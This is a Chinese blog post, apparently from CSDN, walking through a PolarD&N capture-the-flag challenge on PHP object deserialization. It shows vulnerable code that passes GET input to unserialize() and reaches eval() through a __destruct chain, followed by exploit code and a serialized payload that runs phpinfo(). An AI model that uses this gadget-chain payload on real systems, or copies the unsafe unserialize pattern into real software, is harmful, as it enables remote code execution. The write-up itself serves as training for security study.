PolarD&N_CTF_WEB_反序列化

最新推荐文章于 2024-07-11 22:28:56 发布
最新推荐文章于 2024-07-11 22:28:56 发布
阅读量166 收藏
点赞数
分类专栏: Polar_CTF靶场随笔 文章标签: 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_62626298/article/details/133804541
版权

Polar_CTF官方靶场

先查看一下站点

直接给出了源码,但没有格式化,可以通过F12查看源码,或者在本地的编译器查看

<?php
class example {
    public $handle;
    function __destruct(){
        $this->funnnn();
    } function funnnn(){
        $this->handle->close();
    }
}
class process{
    public $pid;
    function close(){
        eval($this->pid);
    }
}
if(isset($_GET['data'])){
    $user_data=unserialize($_GET['data']);
}
?>
  • _construct() 类的构造函数   __destruct() 类的析构函数
  • 两个魔法函数

在这个代码中,创建了一个example类,一个process类,example类中有一个变量$handle,一个魔法函数__destruct(),魔幻函数中调用了函数funnnn,然而根据funnnn中的函数显示,变量handle调用了prcocess类的方法,这说明handle变量是一个process类的实例对象。

需要通过get方法输入的是一个data值,而且data值在传递进去之后,会先被反序列化一下,序列化只会保存对象的所有变量。

思路:

1.必须让handle变量是一个process类的实例化对象

2.由于process中的close()函数是eval执行语句,所以handle中的pid就可以是我们想要执行的语句

exp:

class example{
    public $handle;
    function __construct(){//创建实例时执行
        $this->handle = new process();//创建一个process对象
    }
}
class process{
    public $pid;
    function __construct(){
        $this->pid = "phpinfo();";//创建时将pid变量设置为phpinfo();
    }
}

$test = new example();
echo serialize($test);//打印payload

?>

执行后得到payload

O:7:"example":1:{s:6:"handle";O:7:"process":1:{s:3:"pid";s:10:"phpinfo();";}}

使用get方法传参的data

get flag

加冕@
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
matlab开发-垂直风速方向
08-27
`polard2cart.m` 可能是转换函数,将极坐标(角度和半径)转换为笛卡尔坐标(x和y)。在处理风向数据时,这种转换可能很有用,因为它允许在直角坐标系统中进行进一步的计算和可视化。 `winddata.txt` 文件包含了...
PolarD&N_CTF_WEB_被黑掉的站
weixin_62626298的博客
10-12 218
1.首先进网站看一下i提示说现在站中还有很多马我们用kali中dirsearch来扫描一下本站目录可以看出现在站中有一个bak备份文件和一个shell.php的木马先访问一下shell.php是一个登录网页随便输入密码,打开bp抓包看一下传递了一个参数pass再打开备份文件看一下好像是一个密码字典,使用bp爆破一下试试攻击后得到flag。
PolarD&N-CTF-web方向-简单
J1ng_Hong的博客
12-06 2505
所以bp的方法就不行了。然后源码看了好久都没找到id=9的地方,并且我还尝试传入id这个参数。post传参一个yyds=666,这是不会被检测的。这就是说我们需要post一个名为xdmtql的变量,然后这个变量不能是数组。然后发现有一个index.php,然后发现根目录有一个flag的文件。然后发现了一个叫做/.index.php.swp的备份文件。这就说明,如果换行符应该是不会被检测的。虽然很多乱码,但是flag还是包含在里面的。要匹配 . ,请使用 \.。然后就得到了flag。然后就得到了flag。
polar靶场通关笔记
weixin_43296565的博客
06-06 5064
这里是关于自己打polar靶场的小笔记
PolarD&N(简单rce)
果粒程
04-16 513
外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-i7IKevHK-1681605902192)(D:\网安笔记\图片\image-20230415190913908.png)]
PolarD&N】刷题记录2
青青很OK的博客
04-02 698
当通过POST方式传递name变量的值,会被存入到session中,会在/tmp目录下存储session的值。第二个file是文件包含,php文件会被执行,然后file那边过滤了base加密等方式。1.查看代码,提取精华:get请求让id=1,post请求jljcxy=flag。2.随便输入点东西,然后提交查询,发现没有东西。6.开始攻击,等待完成后按照长度排序,然后查看内容,获得flag。2.抓个包看看,发现了base32,解码发现是一个目录。1.查看页面,很经典的上传页面,上传个一句话木马看看。
PolarD&N-CTF-web方向-中等
J1ng_Hong的博客
12-12 1555
(由于发现中等题里面有许多新的知识点,所以特意拉了一个新的博客来展示)
PolarD&N-CTF-web方向-困难
J1ng_Hong的博客
12-13 1565
或者在payload中更改不可见字符为%00也可以,但是flag不在当前目录,wp说flag在上一级目录,那么我们payload中要读取的是../flag.php就可以了。
基于Matlab绘制风向与风速的关系图.zip
02-08
Matlab是一款强大的数学计算软件,它提供了丰富的图形化界面和编程环境,非常适合进行数据可视化和分析工作。以下是对相关文件和知识点的详细解释: 1. **plotWinDirVel.m**:这是一个Matlab脚本文件,用于绘制风向...
Polar_D&N_[MISC]cat flag
m0_73720466的博客
10-15 158
修改文件后缀为docx,打开发现有密码,用工具Accent OFFICE Password Recovery暴力破解。发现在最后一页,但是有个图片挡住了,挪开图片发现是空白的,于是全选并将文字改变颜色,出现flag。foremost分离出一个文件,放在winhex下发现是MS Office/OLE2的文件头。打开后发现只有第一页和最后一页有文字和图片其他的都是空白页,于是搜索flag。输入密码19631,发现文档打不开,于是后缀改为ppt。考点:文件分离,文件头特征,密码爆破。
服务器】端口映射
2301_82023330的博客
07-11 539
端口映射(Port Mapping)是一种网络技术,通过将一个端口的数据流重定向到另一个端口,允许外部设备访问内部网络中的特定服务。主要有本地端口映射、远程端口映射和动态端口映射三种类型。应用场景包括远程访问内部服务、穿透防火墙、提高安全性以及负载均衡和代理。本文详细介绍了端口映射的概念、类型、应用场景,并通过SSH命令示例展示如何在本地计算机上实现端口映射,以访问远程服务器上的服务。
数据库管理-第218期 服务器内存(20240711)
yhw1809的博客
07-11 615
本期简单介绍了ECC内存是如何实现校验纠错的。
【qt】TCP的监听 (设置服务器IP地址和端口号)
qq_74047911的博客
07-07 279
当一个TCP服务器程序启动时,它会绑定到一个特定的IP地址和一个端口号上,以便可以接收来自该IP地址和端口号的传入连接请求.我们是从下拉框选的,都是QString类型,我们要进行转换.端口号可以自己设置,范围在0~65535也就是两个字节.但是0~1024一般不可以设置,操作系统用了已经.所以我们要先来获取主机的IP地址和设置端口号.TCP监听是在自己的IP地址上进行的。(),参数是ip地址和端口号.()来获取服务器的ip地址。()来获取服务器的地址.协议,我们需要使用到。获取到主机的IP地址。
WSGI 服务器教程:`execute` 方法解析
最新发布
jixiaoyu0209的博客
07-11 245
通过本教程,我们详细解析了一个用于 WSGI 服务器的execute方法,解释了它如何执行 WSGI 应用程序,处理应用程序的响应数据,并确保资源被正确释放。理解这些内容有助于更好地掌握 WSGI 规范,并实现自定义的 WSGI 服务器。希望这篇教程对你有所帮助。更多详细信息和示例请参考官方文档。
Linux 中什么是平均负载
ruky36的专栏
07-08 428
在Linux系统中,平均负载(Load Average)是一个重要的性能指标,用来衡量系统在特定时间间隔内处理进程负载的能力。2. 等待运行的进程(Runnable):等待CPU资源的进程,即已经准备好运行但尚未分配到CPU时间的进程。- 如果平均负载低于CPU核心数,通常认为系统有足够的资源来处理当前的进程负载。- 15分钟平均负载:显示了过去15分钟内系统的平均活跃进程数。- 1分钟平均负载:显示了过去1分钟内系统的平均活跃进程数。- 5分钟平均负载:显示了过去5分钟内系统的平均活跃进程数。
第一次作业
long_mingyue的博客
07-11 324
配置对应的接口:(根据拓扑进行对应的接口配置以及ip的规划)创建对应的dmz,Isp,游客区,生产区以及办公区的对应接口配置。5.生产区访问DMZ区时,需要进行protal认证,设立生产区用户组织架构,至少包含三个部门,每个部门三个用户,用户统一密码。访问DMZ区使用免认证,游客区人员不固定,不允许访问DMZ区和生产区,统一使用Guest用户登录,密码Admin@123,对应的部门认证策略(注意修改里面的认证动作)市场部--免认证,研发部--匿名认证,生产区--Portal认证。
Gunicorn:Python Web应用的高效生产服务器
UnityBoy的博客
07-11 213
在现代Web开发中,部署Python Web应用通常需要一个既高效又可靠的服务器。Gunicorn(Green Unicorn)是一个Python WSGI HTTP服务器,它简单、快速且易于使用,非常适合生产环境。本文将介绍Gunicorn的基本概念、安装方法、配置选项以及如何将其与流行的Web框架集成。
ENSP实现防火墙区域策略与用户管理
2301_80177550的博客
07-11 642
游客区人员不固定,不允许访问DMZ区和生产区,统一使用Guest用户登录,密码Admin@123,游客仅有访问公司门户网站和上网权限,门户网站地址为10.0.3.10。5.生产区访问DMZ区时,需要进行protal认证,设立生产区用户组织架构,至少包含三个部门,每个部门三个用户,用户统一密码openlab123。4.办公区分为市场部和研发部,研发部IP地址固定,访问DMZ区使用匿名认证,研发部需要用户绑定IP地址,访问DMZ区使用免认证。2.生产区不允许访问互联网,办公区和游客区允许访问互联网。
NFS服务器、autofs自动挂载综合实验
ouqisheng的博客
07-11 844
现有主机 node01 和 node02,完成如下需求:1、在 node01 主机上提供 DNS 和 WEB 服务2、dns 服务提供本实验所有主机名解析3、web服务提供 www.rhce.com 虚拟主机4、该虚拟主机的documentroot目录在 /nfs/rhce 目录5、该目录由 node02 主机提供的NFS服务共享6、该目录可以通过autofs服务实现自动挂载7、所有服务应该在重启之后依然可以正常使用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值